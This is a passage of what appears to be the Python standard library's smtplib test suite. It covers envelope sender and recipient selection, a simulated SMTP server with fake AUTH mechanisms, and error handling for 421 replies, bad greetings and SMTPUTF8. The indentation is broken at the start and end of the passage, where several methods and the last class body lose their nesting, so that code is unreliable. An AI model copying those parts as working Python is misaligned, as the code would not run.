        to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                             re.MULTILINE)
        self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
    """Explicit from_addr/to_addrs arguments override message headers."""
    # Make sure addresses specified in call override those in message.
    m = email.mime.text.MIMEText('A test message')
    m['From'] = 'foo@bar.com'
    m['To'] = 'John, Dinsdale'
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
    # XXX (see comment in testSend)
    time.sleep(0.01)
    smtp.quit()

    self.client_evt.set()
    self.serv_evt.wait()
    self.output.flush()
    # Remove the X-Peer header that DebuggingServer adds.
    test_output = self.get_output_without_xpeer()
    del m['X-Peer']
    mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
    self.assertEqual(test_output, mexpect)
    debugout = smtpd.DEBUGSTREAM.getvalue()
    sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
    self.assertRegex(debugout, sender)
    # The header addresses must NOT have been used as envelope recipients.
    for addr in ('John', 'Dinsdale'):
        to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                             re.MULTILINE)
        self.assertNotRegex(debugout, to_addr)
    recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
    self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
    """With multiple From addresses, Sender supplies the envelope sender."""
    # The Sender header, when present, overrides From for the envelope
    # sender (the original comment said "overrides To", which does not
    # match the assertion on the debug log below).
    m = email.mime.text.MIMEText('A test message')
    m['From'] = 'Bernard, Bianca'
    m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
    m['To'] = 'John, Dinsdale'
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.send_message(m)
    # XXX (see comment in testSend)
    time.sleep(0.01)
    smtp.quit()

    self.client_evt.set()
    self.serv_evt.wait()
    self.output.flush()
    # Remove the X-Peer header that DebuggingServer adds.
    test_output = self.get_output_without_xpeer()
    del m['X-Peer']
    mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
    self.assertEqual(test_output, mexpect)
    debugout = smtpd.DEBUGSTREAM.getvalue()
    sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
    self.assertRegex(debugout, sender)
    for addr in ('John', 'Dinsdale'):
        to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                             re.MULTILINE)
        self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
    """A single Resent- block supplies the envelope sender and recipients."""
    m = email.mime.text.MIMEText('A test message')
    m['From'] = 'foo@bar.com'
    m['To'] = 'John'
    m['CC'] = 'Sally, Fred'
    m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
    m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
    m['Resent-From'] = 'holy@grail.net'
    m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
    m['Resent-Bcc'] = 'doe@losthope.net'
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.send_message(m)
    # XXX (see comment in testSend)
    time.sleep(0.01)
    smtp.quit()

    self.client_evt.set()
    self.serv_evt.wait()
    self.output.flush()
    # The Resent-Bcc headers are deleted before serialization.
    del m['Bcc']
    del m['Resent-Bcc']
    # Remove the X-Peer header that DebuggingServer adds.
    test_output = self.get_output_without_xpeer()
    del m['X-Peer']
    mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
    self.assertEqual(test_output, mexpect)
    # Envelope addresses must come from the Resent-* headers, not From/To.
    debugout = smtpd.DEBUGSTREAM.getvalue()
    sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
    self.assertRegex(debugout, sender)
    for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
        to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                             re.MULTILINE)
        self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
    """Two Resent- blocks are ambiguous, so send_message raises ValueError."""
    m = email.mime.text.MIMEText('A test message')
    m['From'] = 'foo@bar.com'
    m['To'] = 'John'
    m['CC'] = 'Sally, Fred'
    m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
    # First Resent- block ...
    m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
    m['Resent-From'] = 'holy@grail.net'
    m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
    m['Resent-Bcc'] = 'doe@losthope.net'
    # ... and a second one: send_message cannot know which is most recent.
    m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
    m['Resent-To'] = 'holy@grail.net'
    m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    with self.assertRaises(ValueError):
        smtp.send_message(m)
    smtp.close()
class NonConnectingTests(unittest.TestCase):
    """Exercise SMTP objects that never establish a connection."""

    def testNotConnected(self):
        # Operations on an unconnected SMTP object should raise
        # SMTPServerDisconnected (at present the attempt in SMTP.send to
        # reference the nonexistent 'sock' attribute of the SMTP object
        # causes an AttributeError).
        smtp = smtplib.SMTP()
        with self.assertRaises(smtplib.SMTPServerDisconnected):
            smtp.ehlo()
        with self.assertRaises(smtplib.SMTPServerDisconnected):
            smtp.send('test msg')

    def testNonnumericPort(self):
        # A non-numeric port must raise OSError, whether passed separately
        # or embedded in the host string.
        with self.assertRaises(OSError):
            smtplib.SMTP("localhost", "bogus")
        with self.assertRaises(OSError):
            smtplib.SMTP("localhost:bogus")

    def testSockAttributeExists(self):
        # Regression test: 'sock' used to be missing outside of a connect()
        # call, raising AttributeError instead of being None.
        with smtplib.SMTP() as smtp:
            self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
    """send_message() must add SMTPUTF8/BODY=8BITMIME without mutating input."""

    def setUp(self):
        self.msg = EmailMessage()
        self.msg['From'] = 'Páolo <főo@bar.com>'
        self.smtp = smtplib.SMTP()
        # Stub out the wire protocol: pretend EHLO succeeded and that the
        # server advertises every extension send_message() asks about.
        self.smtp.ehlo = Mock(return_value=(200, 'OK'))
        self.smtp.has_extn = Mock()
        self.smtp.sendmail = Mock()

    def testSendMessage(self):
        # Both calls must pass the same default mail options to sendmail().
        for _ in range(2):
            self.smtp.send_message(self.msg)
        for call in self.smtp.sendmail.call_args_list:
            self.assertEqual(call[0][3], ('SMTPUTF8', 'BODY=8BITMIME'))

    def testSendMessageWithMailOptions(self):
        mail_options = ['STARTTLS']
        self.smtp.send_message(self.msg, None, None, mail_options)
        # The caller's list must not have been mutated ...
        self.assertEqual(mail_options, ['STARTTLS'])
        # ... while the options actually passed on gain the defaults.
        self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
                         ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME'))
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
    """Client behaviour when the server answers the greeting with a failure."""

    def setUp(self):
        # Route smtplib's networking through the mock socket module and
        # make every connection reply with a non-2xx greeting.
        smtplib.socket = mock_socket
        mock_socket.reply_with(b"199 no hello for you!")
        # Capture stdout so debug noise does not leak into the test run.
        self.old_stdout = sys.stdout
        self.output = io.StringIO()
        sys.stdout = self.output
        self.port = 25

    def tearDown(self):
        # Restore the real socket module and stdout.
        smtplib.socket = socket
        sys.stdout = self.old_stdout

    def testFailingHELO(self):
        with self.assertRaises(smtplib.SMTPConnectError):
            smtplib.SMTP(HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
    """The client must reject server reply lines longer than _MAXLINE."""

    # A single reply far longer than smtplib's per-line limit.
    respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'

    def setUp(self):
        self.thread_key = threading_setup()
        self.old_stdout = sys.stdout
        self.output = io.StringIO()
        sys.stdout = self.output

        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(15)
        self.port = support.bind_port(self.sock)
        servargs = (self.evt, self.respdata, self.sock)
        self.thread = threading.Thread(target=server, args=servargs)
        self.thread.start()
        # Wait until the server thread is ready, then re-arm the event so
        # tearDown can wait for the thread to finish.
        self.evt.wait()
        self.evt.clear()

    def tearDown(self):
        self.evt.wait()
        sys.stdout = self.old_stdout
        join_thread(self.thread)
        del self.thread
        self.doCleanups()
        threading_cleanup(*self.thread_key)

    def testLineTooLong(self):
        # Connecting triggers reading the oversized greeting, which must
        # raise SMTPResponseException rather than buffer without bound.
        self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
                          HOST, self.port, 'localhost', 3)
# Fixture data shared by the simulated-server tests below.
# Known mailboxes: address spec -> display name.
sim_users = {'Mr.A@somewhere.com':'John A',
             'Ms.B@xn--fo-fka.com':'Sally B',
             'Mrs.C@somewhereesle.com':'Ruth C',
             }

# The one (user, password) pair the simulated AUTH mechanisms accept.
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
# Fixed base64-encoded CRAM-MD5 challenge the simulated server always issues.
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
                          'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
# Mailing lists known to the simulated EXPN handler.
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
             'list-2':['Ms.B@xn--fo-fka.com',],
             }
# Simulated SMTP channel & server
# NOTE(review): found_terminator() reads e.smtp_code and e.smtp_error from
# instances of this exception — presumably set as attributes at the raise
# sites (not visible in this chunk); confirm before relying on it.
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
    """smtpd.SMTPChannel extended with canned responses and fake AUTH support.

    Tests assign the class/instance attributes below to force specific
    replies or disconnects and to count protocol commands.
    """

    # Canned replies: when not None they replace the normal response.
    quit_response = None
    mail_response = None
    rcpt_response = None   # list of replies, one per RCPT command
    data_response = None
    # Command counters inspected by tests.
    rcpt_count = 0
    rset_count = 0
    # When truthy, close the channel right after replying to MAIL.
    disconnect = 0
    AUTH = 99  # Add protocol state to enable auth testing.
    authenticated_user = None

    def __init__(self, extra_features, *args, **kw):
        # Extra EHLO feature lines advertised in addition to the defaults.
        self._extrafeatures = ''.join(
            [ "250-{0}\r\n".format(x) for x in extra_features ])
        super(SimSMTPChannel, self).__init__(*args, **kw)

    # AUTH related stuff. It would be nice if support for this were in smtpd.
    def found_terminator(self):
        """While in the AUTH state, feed complete lines to the auth object."""
        if self.smtp_state == self.AUTH:
            line = self._emptystring.join(self.received_lines)
            print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
            self.received_lines = []
            try:
                self.auth_object(line)
            except ResponseException as e:
                # Mechanism failed: fall back to command mode and report.
                self.smtp_state = self.COMMAND
                self.push('%s %s' % (e.smtp_code, e.smtp_error))
            return
        super().found_terminator()

    def smtp_AUTH(self, arg):
        """Dispatch AUTH to the matching _auth_<mechanism> method."""
        if not self.seen_greeting:
            self.push('503 Error: send EHLO first')
            return
        if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
            self.push('500 Error: command "AUTH" not recognized')
            return
        if self.authenticated_user is not None:
            self.push(
                '503 Bad sequence of commands: already authenticated')
            return
        args = arg.split()
        if len(args) not in [1, 2]:
            self.push('501 Syntax: AUTH <mechanism> [initial-response]')
            return
        auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
        try:
            self.auth_object = getattr(self, auth_object_name)
        except AttributeError:
            # NOTE(review): the adjacent string literals join with a doubled
            # space ("unsupported  authentication") — looks unintended.
            self.push('504 Command parameter not implemented: unsupported '
                      ' authentication mechanism {!r}'.format(auth_object_name))
            return
        self.smtp_state = self.AUTH
        # A second argument, if present, is the RFC 4954 initial response.
        self.auth_object(args[1] if len(args) == 2 else None)

    def _authenticated(self, user, valid):
        # Final step of every mechanism: report the outcome and return the
        # channel to the COMMAND state.
        if valid:
            self.authenticated_user = user
            self.push('235 Authentication Succeeded')
        else:
            self.push('535 Authentication credentials invalid')
        self.smtp_state = self.COMMAND

    def _decode_base64(self, string):
        return base64.decodebytes(string.encode('ascii')).decode('utf-8')

    def _auth_plain(self, arg=None):
        if arg is None:
            # No initial response: issue an empty challenge.
            self.push('334 ')
        else:
            logpass = self._decode_base64(arg)
            try:
                *_, user, password = logpass.split('\0')
            except ValueError as e:
                self.push('535 Splitting response {!r} into user and password'
                          ' failed: {}'.format(logpass, e))
                return
            self._authenticated(user, password == sim_auth[1])

    def _auth_login(self, arg=None):
        # Two-step mechanism: prompt for username, then for password.
        if arg is None:
            # base64 encoded 'Username:'
            self.push('334 VXNlcm5hbWU6')
        elif not hasattr(self, '_auth_login_user'):
            self._auth_login_user = self._decode_base64(arg)
            # base64 encoded 'Password:'
            self.push('334 UGFzc3dvcmQ6')
        else:
            password = self._decode_base64(arg)
            self._authenticated(self._auth_login_user, password == sim_auth[1])
            del self._auth_login_user

    def _auth_buggy(self, arg=None):
        # This AUTH mechanism will 'trap' client in a neverending 334
        # base64 encoded 'BuGgYbUgGy'
        self.push('334 QnVHZ1liVWdHeQ==')

    def _auth_cram_md5(self, arg=None):
        if arg is None:
            self.push('334 {}'.format(sim_cram_md5_challenge))
        else:
            logpass = self._decode_base64(arg)
            try:
                user, hashed_pass = logpass.split()
            except ValueError as e:
                self.push('535 Splitting response {!r} into user and password '
                          'failed: {}'.format(logpass, e))
                return False
            # Recompute the expected HMAC-MD5 digest of the fixed challenge.
            valid_hashed_pass = hmac.HMAC(
                sim_auth[1].encode('ascii'),
                self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
                'md5').hexdigest()
            self._authenticated(user, hashed_pass == valid_hashed_pass)
    # end AUTH related stuff.

    def smtp_EHLO(self, arg):
        """Advertise the built-in extensions plus any extra features."""
        resp = ('250-testhost\r\n'
                '250-EXPN\r\n'
                '250-SIZE 20000000\r\n'
                '250-STARTTLS\r\n'
                '250-DELIVERBY\r\n')
        resp = resp + self._extrafeatures + '250 HELP'
        self.push(resp)
        self.seen_greeting = arg
        self.extended_smtp = True

    def smtp_VRFY(self, arg):
        # For max compatibility smtplib should be sending the raw address.
        if arg in sim_users:
            self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
        else:
            self.push('550 No such user: %s' % arg)

    def smtp_EXPN(self, arg):
        """Expand a known mailing list as a multi-line 250 reply."""
        list_name = arg.lower()
        if list_name in sim_lists:
            user_list = sim_lists[list_name]
            for n, user_email in enumerate(user_list):
                quoted_addr = smtplib.quoteaddr(user_email)
                # '250-' continuation lines, '250 ' (space) on the last one.
                if n < len(user_list) - 1:
                    self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
                else:
                    self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
        else:
            self.push('550 No access for you!')

    def smtp_QUIT(self, arg):
        if self.quit_response is None:
            super(SimSMTPChannel, self).smtp_QUIT(arg)
        else:
            self.push(self.quit_response)
            self.close_when_done()

    def smtp_MAIL(self, arg):
        if self.mail_response is None:
            super().smtp_MAIL(arg)
        else:
            self.push(self.mail_response)
            if self.disconnect:
                self.close_when_done()

    def smtp_RCPT(self, arg):
        if self.rcpt_response is None:
            super().smtp_RCPT(arg)
            return
        # Serve the canned responses one per RCPT, in order.
        self.rcpt_count += 1
        self.push(self.rcpt_response[self.rcpt_count-1])

    def smtp_RSET(self, arg):
        self.rset_count += 1
        super().smtp_RSET(arg)

    def smtp_DATA(self, arg):
        if self.data_response is None:
            super().smtp_DATA(arg)
        else:
            self.push(self.data_response)

    def handle_error(self):
        # Let asyncore errors propagate instead of being swallowed.
        raise
class SimSMTPServer(smtpd.SMTPServer):
    """SMTPServer that records envelope addresses and supports extra features."""

    channel_class = SimSMTPChannel

    def __init__(self, *args, **kw):
        self._addresses = {}
        self._extra_features = []
        smtpd.SMTPServer.__init__(self, *args, **kw)

    def handle_accepted(self, conn, addr):
        # Hand every new connection to our feature-aware channel class and
        # keep a reference so tests can tweak the live channel.
        channel = self.channel_class(self._extra_features, self, conn, addr,
                                     decode_data=self._decode_data)
        self._SMTPchannel = channel

    def process_message(self, peer, mailfrom, rcpttos, data):
        # Remember the envelope so tests can inspect what was negotiated.
        self._addresses.update({'from': mailfrom, 'tos': rcpttos})

    def add_feature(self, feature):
        """Advertise one more EHLO feature line on future connections."""
        self._extra_features.append(feature)

    def handle_error(self):
        # Surface asyncore errors instead of logging-and-continuing.
        raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
    """Tests that need the feature-rich simulated server (SimSMTPServer)."""

    def setUp(self):
        self.thread_key = threading_setup()
        self.real_getfqdn = socket.getfqdn
        socket.getfqdn = mock_socket.getfqdn
        self.serv_evt = threading.Event()
        self.client_evt = threading.Event()
        # Pick a random unused port by passing 0 for the port number
        self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
        # Keep a note of what port was assigned
        self.port = self.serv.socket.getsockname()[1]
        serv_args = (self.serv, self.serv_evt, self.client_evt)
        self.thread = threading.Thread(target=debugging_server, args=serv_args)
        self.thread.start()

        # wait until server thread has assigned a port number
        self.serv_evt.wait()
        self.serv_evt.clear()

    def tearDown(self):
        socket.getfqdn = self.real_getfqdn
        # indicate that the client is finished
        self.client_evt.set()
        # wait for the server thread to terminate
        self.serv_evt.wait()
        join_thread(self.thread)
        del self.thread
        self.doCleanups()
        threading_cleanup(*self.thread_key)

    def testBasic(self):
        # smoke test
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
        smtp.quit()

    def testEHLO(self):
        """EHLO populates esmtp_features with the advertised extensions."""
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)

        # no features should be present before the EHLO
        self.assertEqual(smtp.esmtp_features, {})

        # features expected from the test server
        expected_features = {'expn':'',
                             'size': '20000000',
                             'starttls': '',
                             'deliverby': '',
                             'help': '',
                             }

        smtp.ehlo()
        self.assertEqual(smtp.esmtp_features, expected_features)
        for k in expected_features:
            self.assertTrue(smtp.has_extn(k))
        self.assertFalse(smtp.has_extn('unsupported-feature'))
        smtp.quit()

    def testVRFY(self):
        """VRFY returns 250 for known users and 550 for unknown ones."""
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)

        for addr_spec, name in sim_users.items():
            expected_known = (250, bytes('%s %s' %
                                         (name, smtplib.quoteaddr(addr_spec)),
                                         "ascii"))
            self.assertEqual(smtp.vrfy(addr_spec), expected_known)

        u = 'nobody@nowhere.com'
        expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
        self.assertEqual(smtp.vrfy(u), expected_unknown)
        smtp.quit()

    def testEXPN(self):
        """EXPN expands known lists and returns 550 for unknown ones."""
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)

        for listname, members in sim_lists.items():
            users = []
            for m in members:
                users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
            expected_known = (250, bytes('\n'.join(users), "ascii"))
            self.assertEqual(smtp.expn(listname), expected_known)

        u = 'PSU-Members-List'
        expected_unknown = (550, b'No access for you!')
        self.assertEqual(smtp.expn(u), expected_unknown)
        smtp.quit()

    def testAUTH_PLAIN(self):
        self.serv.add_feature("AUTH PLAIN")
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
        resp = smtp.login(sim_auth[0], sim_auth[1])
        self.assertEqual(resp, (235, b'Authentication Succeeded'))
        smtp.close()

    def testAUTH_LOGIN(self):
        self.serv.add_feature("AUTH LOGIN")
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
        resp = smtp.login(sim_auth[0], sim_auth[1])
        self.assertEqual(resp, (235, b'Authentication Succeeded'))
        smtp.close()

    def testAUTH_LOGIN_initial_response_ok(self):
        """AUTH LOGIN works when the initial response is sent with AUTH."""
        self.serv.add_feature("AUTH LOGIN")
        with smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15) as smtp:
            smtp.user, smtp.password = sim_auth
            smtp.ehlo("test_auth_login")
            resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
            self.assertEqual(resp, (235, b'Authentication Succeeded'))

    def testAUTH_LOGIN_initial_response_notok(self):
        """AUTH LOGIN also works via the challenge/response exchange."""
        self.serv.add_feature("AUTH LOGIN")
        with smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15) as smtp:
            smtp.user, smtp.password = sim_auth
            smtp.ehlo("test_auth_login")
            resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
            self.assertEqual(resp, (235, b'Authentication Succeeded'))

    def testAUTH_BUGGY(self):
        """A server that keeps re-challenging must trigger SMTPException."""
        self.serv.add_feature("AUTH BUGGY")

        def auth_buggy(challenge=None):
            self.assertEqual(b"BuGgYbUgGy", challenge)
            return "\0"

        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        try:
            smtp.user, smtp.password = sim_auth
            smtp.ehlo("test_auth_buggy")
            expect = r"^Server AUTH mechanism infinite loop.*"
            with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
                smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
        finally:
            smtp.close()

    @requires_hashdigest('md5')
    def testAUTH_CRAM_MD5(self):
        self.serv.add_feature("AUTH CRAM-MD5")
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
        resp = smtp.login(sim_auth[0], sim_auth[1])
        self.assertEqual(resp, (235, b'Authentication Succeeded'))
        smtp.close()

    def testAUTH_multiple(self):
        # Test that multiple authentication methods are tried.
        self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
        resp = smtp.login(sim_auth[0], sim_auth[1])
        self.assertEqual(resp, (235, b'Authentication Succeeded'))
        smtp.close()

    def test_auth_function(self):
        """smtp.auth() works with each of the client's auth_* callables."""
        supported = {'PLAIN', 'LOGIN'}
        # CRAM-MD5 is only testable when md5 is available (e.g. not in
        # FIPS-restricted builds).
        try:
            hashlib.md5()
        except ValueError:
            pass
        else:
            supported.add('CRAM-MD5')
        for mechanism in supported:
            self.serv.add_feature("AUTH {}".format(mechanism))
        for mechanism in supported:
            with self.subTest(mechanism=mechanism):
                smtp = smtplib.SMTP(HOST, self.port,
                                    local_hostname='localhost', timeout=15)
                smtp.ehlo('foo')
                smtp.user, smtp.password = sim_auth[0], sim_auth[1]
                method = 'auth_' + mechanism.lower().replace('-', '_')
                resp = smtp.auth(mechanism, getattr(smtp, method))
                self.assertEqual(resp, (235, b'Authentication Succeeded'))
                smtp.close()

    def test_quit_resets_greeting(self):
        """quit() must forget the EHLO state until the next greeting."""
        smtp = smtplib.SMTP(HOST, self.port,
                            local_hostname='localhost',
                            timeout=15)
        code, message = smtp.ehlo()
        self.assertEqual(code, 250)
        self.assertIn('size', smtp.esmtp_features)
        smtp.quit()
        self.assertNotIn('size', smtp.esmtp_features)
        smtp.connect(HOST, self.port)
        self.assertNotIn('size', smtp.esmtp_features)
        smtp.ehlo_or_helo_if_needed()
        self.assertIn('size', smtp.esmtp_features)
        smtp.quit()

    def test_with_statement(self):
        # Leaving the 'with' block must disconnect the client.
        with smtplib.SMTP(HOST, self.port) as smtp:
            code, message = smtp.noop()
            self.assertEqual(code, 250)
        self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
        # An explicit close() inside the block must not break __exit__.
        with smtplib.SMTP(HOST, self.port) as smtp:
            smtp.close()
        self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')

    def test_with_statement_QUIT_failure(self):
        # A failing QUIT on __exit__ must surface as SMTPResponseException.
        with self.assertRaises(smtplib.SMTPResponseException) as error:
            with smtplib.SMTP(HOST, self.port) as smtp:
                smtp.noop()
                self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
        self.assertEqual(error.exception.smtp_code, 421)
        self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')

    #TODO: add tests for correct AUTH method fallback now that the
    #test infrastructure can support it.

    # Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
    def test__rest_from_mail_cmd(self):
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
        smtp.noop()
        self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
        self.serv._SMTPchannel.disconnect = True
        with self.assertRaises(smtplib.SMTPSenderRefused):
            smtp.sendmail('John', 'Sally', 'test message')
        self.assertIsNone(smtp.sock)

    # Issue 5713: make sure close, not rset, is called if we get a 421 error
    def test_421_from_mail_cmd(self):
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
        smtp.noop()
        self.serv._SMTPchannel.mail_response = '421 closing connection'
        with self.assertRaises(smtplib.SMTPSenderRefused):
            smtp.sendmail('John', 'Sally', 'test message')
        self.assertIsNone(smtp.sock)
        self.assertEqual(self.serv._SMTPchannel.rset_count, 0)

    def test_421_from_rcpt_cmd(self):
        """A 421 on RCPT closes the connection without issuing RSET."""
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
        smtp.noop()
        self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
        with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
            smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
        self.assertIsNone(smtp.sock)
        self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
        self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})

    def test_421_from_data_cmd(self):
        """A 421 on DATA closes the connection before any RCPT is issued."""
        class MySimSMTPChannel(SimSMTPChannel):
            def found_terminator(self):
                if self.smtp_state == self.DATA:
                    self.push('421 closing')
                else:
                    super().found_terminator()
        self.serv.channel_class = MySimSMTPChannel
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
        smtp.noop()
        with self.assertRaises(smtplib.SMTPDataError):
            smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
        self.assertIsNone(smtp.sock)
        self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)

    def test_smtputf8_NotSupportedError_if_no_server_support(self):
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost', timeout=3)
        self.addCleanup(smtp.close)
        smtp.ehlo()
        self.assertTrue(smtp.does_esmtp)
        self.assertFalse(smtp.has_extn('smtputf8'))
        self.assertRaises(
            smtplib.SMTPNotSupportedError,
            smtp.sendmail,
            'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
        self.assertRaises(
            smtplib.SMTPNotSupportedError,
            smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])

    def test_send_unicode_without_SMTPUTF8(self):
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost', timeout=3)
        self.addCleanup(smtp.close)
        self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
        self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')

    def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
        # This test is located here and not in the SMTPUTF8SimTests
        # class because it needs a "regular" SMTP server to work
        msg = EmailMessage()
        msg['From'] = "Páolo <főo@bar.com>"
        msg['To'] = 'Dinsdale'
        msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost', timeout=3)
        self.addCleanup(smtp.close)
        with self.assertRaises(smtplib.SMTPNotSupportedError):
            smtp.send_message(msg)

    def test_name_field_not_included_in_envelop_addresses(self):
        """Only the addr-spec, not the display name, goes in the envelope."""
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost', timeout=3
        )
        self.addCleanup(smtp.close)

        message = EmailMessage()
        message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
        message['To'] = email.utils.formataddr(('René', 'rene@example.com'))

        self.assertDictEqual(smtp.send_message(message), {})

        self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
        self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
    """SimSMTPServer variant advertising SMTPUTF8/8BITMIME, recording calls."""

    def __init__(self, *args, **kw):
        # The base SMTP server turns these on automatically, but our test
        # server is set up to munge the EHLO response, so we need to provide
        # them as well. And yes, the call is to SMTPServer not SimSMTPServer.
        self._extra_features = ['SMTPUTF8', '8BITMIME']
        smtpd.SMTPServer.__init__(self, *args, **kw)

    def handle_accepted(self, conn, addr):
        self._SMTPchannel = self.channel_class(
            self._extra_features, self, conn, addr,
            decode_data=self._decode_data,
            enable_SMTPUTF8=self.enable_SMTPUTF8,
        )

    def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
                        rcpt_options=None):
        # Record the whole envelope so tests can assert on what was sent
        # and which ESMTP options were negotiated.
        self.last_peer = peer
        self.last_mailfrom = mailfrom
        self.last_rcpttos = rcpttos
        self.last_message = data
        self.last_mail_options = mail_options
        self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
